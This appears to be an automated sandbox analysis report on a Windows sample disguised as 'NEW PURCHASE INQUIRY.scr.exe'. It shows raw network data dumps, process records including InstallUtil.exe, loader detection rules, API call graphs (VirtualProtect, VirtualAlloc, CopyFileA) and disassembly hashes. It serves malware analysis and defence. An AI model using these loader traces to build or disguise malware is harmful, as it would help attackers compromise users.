                                      2025-01-09 07:19:02 UTC16384INData Raw: b3 77 82 be a6 d1 3b 67 a9 f1 ed 5a e8 65 79 d4 30 34 39 22 5a b5 5f aa 8c d9 28 0a 99 fe 3a 5a 21 50 d3 b6 2c 85 98 48 5e af 69 dc aa 2a 12 d9 59 84 c6 59 f5 83 81 1f a8 f7 8b ce d9 c0 46 85 8f b5 32 d3 ee 36 b5 ff 44 d9 76 4d 45 d7 f2 d2 06 67 be 10 f7 f7 cf 50 ef 10 39 89 82 7a d0 88 dd 1a 5a ef 3e 10 89 1e f1 13 71 79 3b 60 58 2e 39 9a 83 a0 36 1e 8b 73 c0 e5 03 40 fb 03 98 51 4e f5 db 6b fe 97 d3 95 f2 e9 27 b5 4b b9 d3 8c c8 1c 41 63 d0 c1 f4 3f 45 cd 27 c6 31 4e 8f 97 5f 13 8b d8 74 d6 c3 39 52 2e b9 69 fa dc 6b 72 0f a5 8a 3e c7 12 4c 9f 5f 6e b8 73 87 4a 4d c0 a1 43 68 3b ad 22 77 eb da bd 4d 79 00 73 5f eb 8b 78 d2 a2 80 09 80 27 83 25 34 23 75 11 59 b5 25 0e dd dc aa b0 e7 68 d6 fe 5c 80 77 0a 30 1c cb c0 73 45 c0 fb b2 9f 20 c9 1e 3a 4b ba b7
                                      Data Ascii: w;gZey049"Z_(:Z!P,H^i*YYF26DvMEgP9zZ>qy;`X.96s@QNk'KAc?E'1N_t9R.ikr>L_nsJMCh;"wMys_x'%4#uY%h\w0sE :K
                                      2025-01-09 07:19:03 UTC16384INData Raw: b9 30 b0 44 c9 d4 a7 20 38 93 f1 4a be 32 b1 15 18 f1 5c c2 d3 a2 bc ea 91 1d 08 15 68 08 98 b0 19 7d 3d 55 46 25 d2 bb 91 f0 c0 4e c3 d9 44 c3 1a 2d b1 23 95 ba c9 6a 2a 2d b5 8e ee 01 dd 2a 27 64 73 33 20 63 e9 f7 8d 9e c1 a7 e0 d8 9f 47 29 42 0c 5b 5d f7 d2 0b 20 7b 08 db f8 04 20 b4 9b d9 5b 05 2f 39 34 ed 66 f2 b1 c0 ed 52 f7 3a 84 63 2a fa 37 82 10 22 27 19 e1 b0 e2 94 e8 a9 c8 82 b6 0a 93 f1 76 c6 fd 5d b9 9b 91 33 c7 54 94 34 c1 fd ad 38 33 ce b9 fa 39 a1 45 f4 b4 dd aa cf ee b5 0b f4 c6 47 8a 62 73 e7 0d e5 1a da 45 53 33 e2 a4 0e 39 5c 11 8a f1 b3 67 ca 7c d8 37 4c 7d 3c e4 19 99 23 60 11 05 d6 33 4d fa c5 fc 06 ed 4c f4 54 8e 37 57 51 f0 77 3d 6e 2f 24 9f 95 91 57 bc bb 79 14 51 fa bc ec 6e 92 09 9c 15 b9 97 a8 ab c8 ea a5 b4 1d c2 e0 b5 2a c3
                                      Data Ascii: 0D 8J2\h}=UF%ND-#j*-*'ds3 cG)B[] { [/94fR:c*7"'v]3T4839EGbsES39\g|7L}<#`3MLT7WQw=n/$WyQn*
                                      2025-01-09 07:19:03 UTC16384INData Raw: cf ce 90 34 02 c2 1c b7 ce 6a 3c c6 65 38 ee b9 55 88 7f 94 52 b9 84 72 1f 66 e0 9d 9b bf 9b 7b cc 07 50 8d 3a d4 6d 8e 8e 39 b0 7d 9d 2f 23 ad 16 94 76 b9 dc 1d 18 9b b1 a3 52 45 a0 f5 7a 67 3d fa c4 62 8a 1f da 7c e6 4e d4 c5 ac 89 5c 3e 46 2e 4e 64 06 67 aa b5 53 52 56 68 6c b1 8d 29 04 dc b2 dc 90 af 4f 79 92 0c c5 1a ae 70 10 32 17 33 95 aa ee 59 32 50 bf ed 09 4e 98 83 09 0d 35 1c db e6 65 e9 b7 23 e1 c3 5e 9e 00 28 b6 52 7e 6d d5 66 43 b4 50 5b 89 68 89 fd 3b 92 e7 70 74 9a 32 9f f1 81 a1 d3 bd 4f 52 1f 02 42 4e 7f b5 5d fd ab cf d0 04 9f d5 e7 ed 1a 0a c6 77 ef 24 f2 7a 63 47 1f 87 75 c5 d4 8b c9 86 f1 a4 a9 da 0a d4 5e 94 2d de ff c6 39 db bc 24 82 e5 cb f8 c3 bb c7 cc dd 18 47 8c 7f 4b a4 fc e8 08 93 5e 20 1e a8 48 2c ac 19 6a 55 61 53 27 c4 3b
                                      Data Ascii: 4j<e8URrf{P:m9}/#vREzg=b|N\>F.NdgSRVhl)Oyp23Y2PN5e#^(R~mfCP[h;pt2ORBN]w$zcGu^-9$GK^ H,jUaS';
                                      2025-01-09 07:19:03 UTC16384INData Raw: 33 25 09 74 51 a7 05 f8 e5 2e a7 3f a4 9a 25 2b e3 6e 66 6e 65 57 6e d0 01 a6 11 11 6a 7b f4 c3 78 c5 c8 ab 18 f5 88 b5 99 f8 53 7f 4b 78 3f 1e 0f 81 97 80 43 e2 ed a6 f0 e2 74 3d 42 c5 2f 56 c8 5e 03 75 b9 68 aa f6 da bb fd 8d 80 93 c9 fa da b0 9a 81 89 26 58 91 a4 b3 63 33 3a 93 b6 6d 5a bd a3 53 7c 9e 78 82 25 30 b5 cf 09 52 2d ee c0 83 70 25 51 c5 fd af b6 bc 19 59 c0 a7 c5 64 f2 47 02 de 72 27 13 71 00 2b 3c 8c 1e 8e 72 0a cd d8 7b 1f dd 56 4b 54 3f 76 02 5a 20 ea d9 2b d9 65 80 a2 f7 84 1a 46 bd 1e ea e1 a2 a3 d3 dd b3 8f f5 19 18 a1 74 de 3d 14 03 15 2b 38 f5 3c d3 09 ad 95 c9 a0 5d 41 ba 23 47 51 d6 1b af a3 7b 23 b1 aa 90 fb d0 2b 5b 98 dc 58 f9 0f fd 6f a9 ce e2 e9 b2 ec 62 a1 e8 ef 83 d5 af 7f 5a 66 ef a9 d1 cd da 81 60 3b b4 e5 0a 24 e4 ab 79
                                      Data Ascii: 3%tQ.?%+nfneWnj{xSKx?Ct=B/V^uh&Xc3:mZS|x%0R-p%QYdGr'q+<r{VKT?vZ +eFt=+8<]A#GQ{#+[XobZf`;$y
                                      2025-01-09 07:19:03 UTC16384INData Raw: 43 3c c3 aa 39 2b e0 e4 7a 3e 89 57 3c 89 ff bd e2 79 9f 14 81 72 a6 b7 b6 b9 0f 85 22 47 a9 d9 bb 4e 9c 3e 19 56 e8 d8 7d e8 8c 85 c4 0b 6f e9 b2 4b 68 fa d6 ab 14 2b 07 2c f6 ca 8d 06 6c 57 ba 8a b7 2f 33 b8 75 37 98 1d 88 ef bb ef 14 28 cb 86 b0 77 24 9f b6 e1 88 61 64 8e 61 c5 9b 13 36 67 56 0d 4a 5b 39 0f bb 6d a9 90 cb 56 50 14 d7 76 96 c6 b8 49 67 3b 81 2f e1 1f 2c cd bb 7e a7 e5 23 61 fb 2c b8 c2 22 5a 1f 43 80 4e 84 b4 30 ca 7c d7 bd 58 3a 27 1d 13 3c 05 58 85 d7 79 19 ba 29 96 e1 27 e7 4e 48 b8 cb c0 a2 8b 88 88 3d 93 cf 05 95 7c af 90 09 e0 69 ea 1c 11 b1 28 60 46 a2 39 37 72 a1 fd 54 46 b5 bb 18 79 2e 3a 3c 71 56 14 e0 f8 d0 80 da 5e 54 67 1d 99 42 a3 2b ac a2 4b fd 0c 78 32 33 8d df 86 6f d6 61 d2 f2 1e 68 03 fc ff cb 0c 2b 85 15 25 d2 31 c5
                                      Data Ascii: C<9+z>W<yr"GN>V}oKh+,lW/3u7(w$ada6gVJ[9mVPvIg;/,~#a,"ZCN0|X:'<Xy)'NH=|i(`F97rTFy.:<qV^TgB+Kx23oah+%1


                                      Click to jump to process

                                      Click to jump to process

                                      Click to dive into process behavior distribution

                                      Click to jump to process

                                      Target ID:0
                                      Start time:02:18:58
                                      Start date:09/01/2025
                                      Path:C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\NEW PURCHASE INQUIRY.scr.exe"
                                      Imagebase:0x8f0000
                                      File size:13'312 bytes
                                      MD5 hash:A9BC0FAD0B1A1D6931321BB5286BF6B7
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2203400840.0000000006950000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2180881403.0000000002C4C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2190175430.000000000466E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2190175430.0000000003D17000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      Target ID:2
                                      Start time:02:19:13
                                      Start date:09/01/2025
                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                      Imagebase:0xa00000
                                      File size:42'064 bytes
                                      MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false

                                      Target ID:5
                                      Start time:02:19:13
                                      Start date:09/01/2025
                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6564 -s 1148
                                      Imagebase:0x2f0000
                                      File size:483'680 bytes
                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:10.6%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:0%
                                        Total number of Nodes:142
                                        Total number of Limit Nodes:10
                                        execution_graph 62584 1222220 62585 122223d 62584->62585 62586 122224d 62585->62586 62591 122acd6 62585->62591 62595 122b22e 62585->62595 62599 1223ed8 62585->62599 62604 1225e4a 62585->62604 62608 67e0250 62591->62608 62613 67e0240 62591->62613 62592 1222e9e 62597 67e0250 2 API calls 62595->62597 62598 67e0240 2 API calls 62595->62598 62596 1222e9e 62597->62596 62598->62596 62600 1223ef7 62599->62600 62602 67e0250 2 API calls 62600->62602 62603 67e0240 2 API calls 62600->62603 62601 1223f1b 62602->62601 62603->62601 62626 67e1530 62604->62626 62630 67e1520 62604->62630 62605 1225e6e 62605->62586 62609 67e0277 62608->62609 62618 67e0698 62609->62618 62622 67e06a0 62609->62622 62610 67e0334 62610->62592 62615 67e0244 62613->62615 62614 67e0334 62614->62592 62616 67e0698 VirtualProtect 62615->62616 62617 67e06a0 VirtualProtect 62615->62617 62616->62614 62617->62614 62619 67e069c VirtualProtect 62618->62619 62621 67e0723 62619->62621 62621->62610 62623 67e06e8 VirtualProtect 62622->62623 62625 67e0723 62623->62625 62625->62610 62627 67e1545 62626->62627 62634 67e1570 62627->62634 62631 67e1524 62630->62631 62633 67e1570 2 API calls 62631->62633 62632 67e155d 62632->62605 62633->62632 62636 67e1574 62634->62636 62635 67e155d 62635->62605 62639 67e1688 62636->62639 62643 67e1681 62636->62643 62640 67e16c8 VirtualAlloc 62639->62640 62642 67e1702 62640->62642 62642->62635 62644 67e1684 VirtualAlloc 62643->62644 62646 67e1702 62644->62646 62646->62635 62705 6a79042 62706 6a7904c 62705->62706 62710 693db58 62706->62710 62715 693db48 62706->62715 62707 6a78772 62711 693db6d 62710->62711 62720 693dbb7 62711->62720 62726 693de2e 62711->62726 62712 693db83 62712->62707 62716 693db6d 62715->62716 62718 693dbb7 2 API calls 62716->62718 62719 693de2e 2 API calls 62716->62719 62717 693db83 62717->62707 62718->62717 62719->62717 62721 693db2c 62720->62721 62723 693dbba 62720->62723 62721->62712 62722 693dc09 62722->62712 62723->62722 62731 5bd1f78 62723->62731 62735 5bd1f72 62723->62735 62728 693dbf7 62726->62728 62727 693dc09 62727->62712 62728->62727 62729 5bd1f78 SleepEx 62728->62729 62730 5bd1f72 SleepEx 62728->62730 62729->62728 62730->62728 62732 5bd1fb8 SleepEx 62731->62732 62734 5bd1ff6 62732->62734 62734->62723 62736 5bd1f78 SleepEx 62735->62736 62738 5bd1ff6 62736->62738 62738->62723 62739 6a78d81 62740 6a78d8b 62739->62740 62744 5bd2210 62740->62744 62749 5bd2200 62740->62749 62741 6a78772 62745 5bd2225 62744->62745 62754 5bd2440 62745->62754 62759 5bd2382 62745->62759 62746 5bd223b 62746->62741 62750 5bd2225 62749->62750 62752 5bd2440 2 API calls 62750->62752 62753 5bd2382 2 API calls 62750->62753 62751 5bd223b 62751->62741 62752->62751 62753->62751 62756 5bd2446 62754->62756 62755 5bd267e 62755->62746 62756->62755 62764 5bd2f88 62756->62764 62768 5bd2f90 62756->62768 62761 5bd2392 62759->62761 62760 5bd267e 62760->62746 62761->62760 62762 5bd2f88 VirtualProtect 62761->62762 62763 5bd2f90 VirtualProtect 62761->62763 62762->62761 62763->62761 62765 5bd2fd8 VirtualProtect 62764->62765 62767 5bd3013 62765->62767 62767->62756 62769 5bd2fd8 VirtualProtect 62768->62769 62771 5bd3013 62769->62771 62771->62756 62647 6a78ea0 62648 6a78ea6 62647->62648 62652 5bd7148 62648->62652 62657 5bd713b 62648->62657 62649 6a78eea 62653 5bd715d 62652->62653 62654 5bd7173 62653->62654 62662 5bd8c62 62653->62662 62667 5bd8d09 62653->62667 62654->62649 62658 5bd7148 62657->62658 62659 5bd8d09 2 API calls 62658->62659 62660 5bd7173 62658->62660 62661 5bd8c62 2 API calls 62658->62661 62659->62660 62660->62649 62661->62660 62663 5bd8c61 62662->62663 62663->62662 62664 5bd8d13 62663->62664 62672 5bdca34 62663->62672 62676 5bdca40 62663->62676 62668 5bd8d13 62667->62668 62669 5bd8c61 62667->62669 62669->62667 62670 5bdca34 CopyFileA 62669->62670 62671 5bdca40 CopyFileA 62669->62671 62670->62669 62671->62669 62673 5bdca40 CopyFileA 62672->62673 62675 5bdcb97 62673->62675 62677 5bdca95 CopyFileA 62676->62677 62679 5bdcb97 62677->62679 62680 eed030 62681 eed048 62680->62681 62682 eed0a3 62681->62682 62685 67e0c9d 62681->62685 62690 67e0ca8 62681->62690 62686 67e0ca0 62685->62686 62695 67e1138 62686->62695 62700 67e1127 62686->62700 62687 67e0cf7 62687->62687 62691 67e0cd0 62690->62691 62693 67e1138 2 API calls 62691->62693 62694 67e1127 2 API calls 62691->62694 62692 67e0cf7 62692->62692 62693->62692 62694->62692 62696 67e1165 62695->62696 62697 67e0250 2 API calls 62696->62697 62699 67e12fb 62696->62699 62698 67e12ec 62697->62698 62698->62687 62699->62687 62701 67e112c 62700->62701 62702 67e0250 2 API calls 62701->62702 62704 67e12fb 62701->62704 62703 67e12ec 62702->62703 62703->62687 62704->62687
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203856165.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6a70000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ,nq$4$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq
                                        • API String ID: 0-162385967
                                        • Opcode ID: f483094703c1c0f43ff342241cb2e87c6a3559ba1a3fef5c3c88cd2ec7afc570
                                        • Instruction ID: 41ea739b947f44ebbe667d26e824724dab6b3d5944e7dacd73df3a9573fa760a
                                        • Opcode Fuzzy Hash: f483094703c1c0f43ff342241cb2e87c6a3559ba1a3fef5c3c88cd2ec7afc570
                                        • Instruction Fuzzy Hash: 0AB2E434A002188FDB54DFA8CD94BADB7B6BF88304F1585A9E505AB3A5DB70ED81CF50
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203856165.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6a70000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ,nq$4$$jq$$jq$$jq$$jq
                                        • API String ID: 0-3947795074
                                        • Opcode ID: 452bb2372228167a6595669147c659d5218708f70bfde59956f2c158972889b7
                                        • Instruction ID: 7e0f7c591dacd7d152d4071bdb522ea47442e714a6743e647725bcc6342cf37a
                                        • Opcode Fuzzy Hash: 452bb2372228167a6595669147c659d5218708f70bfde59956f2c158972889b7
                                        • Instruction Fuzzy Hash: A822E834A00215CFDB64DFA4CD94BADB7B6BF88305F1581E9D509AB2A5DB30AD81CF50

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 636 67e4ed8-67e4ef9 637 67e4efb 636->637 638 67e4f00-67e4fe7 636->638 637->638 640 67e4fed-67e512e 638->640 641 67e56e9-67e5711 638->641 685 67e5134-67e518f 640->685 686 67e56b2-67e56dc 640->686 644 67e5e17-67e5e20 641->644 645 67e571f-67e5729 644->645 646 67e5e26-67e5e3d 644->646 649 67e572b 645->649 650 67e5730-67e5824 645->650 649->650 667 67e584e 650->667 668 67e5826-67e5832 650->668 672 67e5854-67e5874 667->672 670 67e583c-67e5842 668->670 671 67e5834-67e583a 668->671 673 67e584c 670->673 671->673 677 67e5876-67e58cf 672->677 678 67e58d4-67e5954 672->678 673->672 689 67e5e14 677->689 699 67e59ab-67e59ee 678->699 700 67e5956-67e59a9 678->700 693 67e5194-67e519f 685->693 694 67e5191 685->694 696 67e56de 686->696 697 67e56e6 686->697 689->644 698 67e55c7-67e55cd 693->698 694->693 696->697 697->641 701 67e51a4-67e51c2 698->701 702 67e55d3-67e564f 698->702 723 67e59f9-67e5a02 699->723 700->723 704 67e5219-67e522e 701->704 705 67e51c4-67e51c8 701->705 743 67e569c-67e56a2 702->743 708 67e5235-67e524b 704->708 709 67e5230 704->709 705->704 710 67e51ca-67e51d5 705->710 712 67e524d 708->712 713 67e5252-67e5269 708->713 709->708 714 67e520b-67e5211 710->714 712->713 719 67e526b 713->719 720 67e5270-67e5286 713->720 717 67e51d7-67e51db 714->717 718 67e5213-67e5214 714->718 724 67e51dd 717->724 725 67e51e1-67e51f9 717->725 722 67e5297-67e5302 718->722 719->720 726 67e528d-67e5294 720->726 727 67e5288 720->727 730 67e5316-67e54cb 722->730 731 67e5304-67e5310 722->731 733 67e5a62-67e5a71 723->733 724->725 728 67e51fb 725->728 729 67e5200-67e5208 725->729 726->722 727->726 728->729 729->714 741 67e552f-67e5544 730->741 742 67e54cd-67e54d1 730->742 731->730 734 67e5a04-67e5a2c 733->734 735 67e5a73-67e5afb 733->735 738 67e5a2e 734->738 739 67e5a33-67e5a5c 734->739 772 67e5c74-67e5c80 735->772 738->739 739->733 746 67e554b-67e556c 741->746 747 67e5546 741->747 742->741 748 67e54d3-67e54e2 742->748 744 67e56a4-67e56aa 743->744 745 67e5651-67e5699 call 67e0208 * 2 743->745 744->686 745->743 750 67e556e 746->750 751 67e5573-67e5592 746->751 747->746 753 67e5521-67e5527 748->753 750->751 758 67e5599-67e55b9 751->758 759 67e5594 751->759 755 67e5529-67e552a 753->755 756 67e54e4-67e54e8 753->756 761 67e55c4 755->761 763 67e54ea-67e54ee 756->763 764 67e54f2-67e5513 756->764 765 67e55bb 758->765 766 67e55c0 758->766 759->758 761->698 763->764 768 67e551a-67e551e 764->768 769 67e5515 764->769 765->766 766->761 768->753 769->768 774 67e5c86-67e5ce1 772->774 775 67e5b00-67e5b09 772->775 790 67e5d18-67e5d42 774->790 791 67e5ce3-67e5d16 774->791 776 67e5b0b 775->776 777 67e5b12-67e5c68 775->777 776->777 779 67e5b5d-67e5b9d 776->779 780 67e5b18-67e5b58 776->780 781 67e5be7-67e5c27 776->781 782 67e5ba2-67e5be2 776->782 794 67e5c6e 777->794 779->794 780->794 781->794 782->794 799 67e5d4b-67e5dde 790->799 791->799 794->772 803 67e5de5-67e5e05 799->803 803->689
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2202408945.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_67e0000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: TJoq$Tejq$pnq$xbmq
                                        • API String ID: 0-1294180740
                                        • Opcode ID: 850a22290b7bb1f342f58c3beb5371ede98d10d0f481e9bfafa8840757dbd92d
                                        • Instruction ID: 4b1dc42bad99ce884317ddef4b3d9f46b1d1552b6f0a7b329bc5492ce8ff0480
                                        • Opcode Fuzzy Hash: 850a22290b7bb1f342f58c3beb5371ede98d10d0f481e9bfafa8840757dbd92d
                                        • Instruction Fuzzy Hash: 21A2B475E00228CFDB65CF69C984A99BBB2FF89304F1581E9D509AB325DB319E85CF40

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1177 67e72a8-67e72b2 1178 67e72ba-67e72e6 1177->1178 1179 67e72b4-67e72b7 1177->1179 1180 67e72ed-67e740f 1178->1180 1181 67e72e8 1178->1181 1179->1178 1185 67e7433-67e743f 1180->1185 1186 67e7411-67e7427 1180->1186 1181->1180 1187 67e7446-67e744b 1185->1187 1188 67e7441 1185->1188 1463 67e742d call 67e9e48 1186->1463 1464 67e742d call 67e9e38 1186->1464 1190 67e744d-67e7459 1187->1190 1191 67e7483-67e74cc 1187->1191 1188->1187 1192 67e745b 1190->1192 1193 67e7460-67e747e 1190->1193 1199 67e74ce 1191->1199 1200 67e74d3-67e7798 1191->1200 1192->1193 1195 67e8be7-67e8bed 1193->1195 1196 67e8bef-67e8c0f 1195->1196 1197 67e8c18 1195->1197 1196->1197 1199->1200 1226 67e81c8-67e81d4 1200->1226 1227 67e779d-67e77a9 1226->1227 1228 67e81da-67e8212 1226->1228 1229 67e77ab 1227->1229 1230 67e77b0-67e78d5 1227->1230 1237 67e82ec-67e82f2 1228->1237 1229->1230 1265 67e78d7-67e790f 1230->1265 1266 67e7915-67e799e 1230->1266 1238 67e82f8-67e8330 1237->1238 1239 67e8217-67e8294 1237->1239 1249 67e868e-67e8694 1238->1249 1254 67e8296-67e829a 1239->1254 1255 67e82c7-67e82e9 1239->1255 1252 67e869a-67e86e2 1249->1252 1253 67e8335-67e8537 1249->1253 1260 67e875d-67e87a8 1252->1260 1261 67e86e4-67e8757 1252->1261 1346 67e853d-67e85d1 1253->1346 1347 67e85d6-67e85da 1253->1347 1254->1255 1259 67e829c-67e82c4 1254->1259 1255->1237 1259->1255 1284 67e8bb1-67e8bb7 1260->1284 1261->1260 1265->1266 1293 67e79ad-67e7a31 1266->1293 1294 67e79a0-67e79a8 1266->1294 1286 67e87ad-67e882f 1284->1286 1287 67e8bbd-67e8be5 1284->1287 1306 67e8857-67e8863 1286->1306 1307 67e8831-67e884c 1286->1307 1287->1195 1321 67e7a33-67e7a3b 1293->1321 1322 67e7a40-67e7ac4 1293->1322 1296 67e81b9-67e81c5 1294->1296 1296->1226 1309 67e886a-67e8876 1306->1309 1310 67e8865 1306->1310 1307->1306 1312 67e8878-67e8884 1309->1312 1313 67e8889-67e8898 1309->1313 1310->1309 1316 67e8b98-67e8bae 1312->1316 1317 67e889a 1313->1317 1318 67e88a1-67e8b79 1313->1318 1316->1284 1317->1318 1323 67e8a6e-67e8ad6 1317->1323 1324 67e88a7-67e8910 1317->1324 1325 67e8915-67e898d 1317->1325 1326 67e8992-67e89fb 1317->1326 1327 67e8a00-67e8a69 1317->1327 1349 67e8b84-67e8b90 1318->1349 1321->1296 1369 67e7ac6-67e7ace 1322->1369 1370 67e7ad3-67e7b57 1322->1370 1357 67e8b4a-67e8b50 1323->1357 1324->1349 1325->1349 1326->1349 1327->1349 1371 67e8675-67e868b 1346->1371 1351 67e85dc-67e8635 1347->1351 1352 67e8637-67e8674 1347->1352 1349->1316 1351->1371 1352->1371 1362 67e8ad8-67e8b36 1357->1362 1363 67e8b52-67e8b5c 1357->1363 1374 67e8b3d-67e8b47 1362->1374 1375 67e8b38 1362->1375 1363->1349 1369->1296 1384 67e7b59-67e7b61 1370->1384 1385 67e7b66-67e7bea 1370->1385 1371->1249 1374->1357 1375->1374 1384->1296 1391 67e7bec-67e7bf4 1385->1391 1392 67e7bf9-67e7c7d 1385->1392 1391->1296 1398 67e7c7f-67e7c87 1392->1398 1399 67e7c8c-67e7d10 1392->1399 1398->1296 1405 67e7d1f-67e7da3 1399->1405 1406 67e7d12-67e7d1a 1399->1406 1412 67e7da5-67e7dad 1405->1412 1413 67e7db2-67e7e36 1405->1413 1406->1296 1412->1296 1419 67e7e38-67e7e40 1413->1419 1420 67e7e45-67e7ec9 1413->1420 1419->1296 1426 67e7ecb-67e7ed3 1420->1426 1427 67e7ed8-67e7f5c 1420->1427 1426->1296 1433 67e7f5e-67e7f66 1427->1433 1434 67e7f6b-67e7fef 1427->1434 1433->1296 1440 67e7ffe-67e8082 1434->1440 1441 67e7ff1-67e7ff9 1434->1441 1447 67e8084-67e808c 1440->1447 1448 67e8091-67e8115 1440->1448 1441->1296 1447->1296 1454 67e8117-67e811f 1448->1454 1455 67e8124-67e81a8 1448->1455 1454->1296 1461 67e81aa-67e81b2 1455->1461 1462 67e81b4-67e81b6 1455->1462 1461->1296 1462->1296 1463->1185 1464->1185
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2202408945.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_67e0000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 2$$jq
                                        • API String ID: 0-2230393480
                                        • Opcode ID: f41adf7fa11d999cc3fa2f70a513fffd09d9763b6023f39c34008af3f3218033
                                        • Instruction ID: fc5787ed32efb57f1963848a3b7adea307d491c797029112787f1bd4582abc0b
                                        • Opcode Fuzzy Hash: f41adf7fa11d999cc3fa2f70a513fffd09d9763b6023f39c34008af3f3218033
                                        • Instruction Fuzzy Hash: D4E2E374E002288FDBA4DF69D994B9ABBF2FB89304F1081E9D509A7354DB346E85CF41
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203856165.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6a70000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Tejq
                                        • API String ID: 0-2468842661
                                        • Opcode ID: f59ba7a1fc7301758dd8325bff93658760417151ed806ec18dcd951a9d4ae5aa
                                        • Instruction ID: a27ef1ec30cec306712ac375401f6822b05a6bf559460110932aaec8242833ad
                                        • Opcode Fuzzy Hash: f59ba7a1fc7301758dd8325bff93658760417151ed806ec18dcd951a9d4ae5aa
                                        • Instruction Fuzzy Hash: 2E02D470E05268CFEBA4EF69C840BAEB7F2FB89304F1080AAD509A7255D7715D85CF51
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203344371.0000000006940000.00000040.00000800.00020000.00000000.sdmp, Offset: 06940000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6940000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: @
                                        • API String ID: 0-2766056989
                                        • Opcode ID: 12ced64a90ec8855e3316457107ac46b04556d6280b3715ec996a92c1db46db6
                                        • Instruction ID: c08029cc722f1878b56bdf6ba8d2634d8f4158d33ee1c4aac6fc731e3ce47798
                                        • Opcode Fuzzy Hash: 12ced64a90ec8855e3316457107ac46b04556d6280b3715ec996a92c1db46db6
                                        • Instruction Fuzzy Hash: 80F1CF74A452688FEBA4EF68C884BD9BBB1FB49304F1085EAD60DA7744DB305E85CF41
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2202408945.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_67e0000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Dqq
                                        • API String ID: 0-373195589
                                        • Opcode ID: bc7234075343ecdecf7190999b7369a365295f3722caa9a8c3789ef3bed21e8c
                                        • Instruction ID: e9c889837057b7452e3dd007ef104525425910dfada90b3642860c82b6d9162b
                                        • Opcode Fuzzy Hash: bc7234075343ecdecf7190999b7369a365295f3722caa9a8c3789ef3bed21e8c
                                        • Instruction Fuzzy Hash: 1AD1BF74E00218CFDB54DFA9D994B9DBBB2BF89304F2080A9D409AB365DB35AD85CF50
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2203284695.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6930000_NEW PURCHASE INQUIRY.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: PHjq
                                        • API String ID: 0-751881793
                                        • Opcode ID: e16759f9ff48b76d7638bd62c294bb47eaf44c60c451ee986e18109183e1fd2c
